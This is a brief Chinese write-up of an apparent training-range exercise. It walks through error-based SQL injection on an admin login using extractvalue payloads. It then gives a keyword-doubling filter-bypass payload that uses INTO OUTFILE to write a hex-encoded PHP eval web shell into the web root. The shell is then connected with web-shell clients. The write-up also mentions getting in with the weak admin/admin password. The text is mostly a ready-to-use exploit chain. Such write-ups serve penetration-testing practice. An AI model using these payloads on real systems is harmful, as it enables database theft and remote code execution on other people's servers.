http://cntj8003.ia.aqlab.cn/bees/admin/login.phpz
直接在给出的靶场链接后面加上admin回车,跳转到后台登录页面,没有做目录扫描
1、在用户名处加上'测试,发现报错,存在注入漏洞
2、尝试报错注入
将用户名改为:admin' or extractvalue(1,concat(0x7e,database())) #
爆数据库安装路径admin' or extractvalue(1,concat(0x7e,@@basedir)) #
phpstudy,哈哈,盲猜网站的web路径为D:/phpStudy/ WWW
找个写入SQL写入一句话木马的payload
admin'+un+union+ion+seselectlect+1,2,3,4,0x3C3F70687020406576616C28245F504F53545B27313233275D293B3F3E++in+into+ououtfiletfile+'D:/phpStudy/www/ttt1.php'--+
其中0x为16进制编码的开头,3C3F70687020406576616C28245F504F53545B27313233275D293B3F3E为<?php @eval($_POST['123']);?>的16进制编码,其他内容请参考其他博主的博客~~
访问http://cntj8003.ia.aqlab.cn/ttt1.php
上菜刀蚁剑进行连接
end。
其实后台密码,我上来就admin+admin登录了,靶场的弱口令习惯了哈哈,但是没有进后台去上传的方式来getshell,哈哈。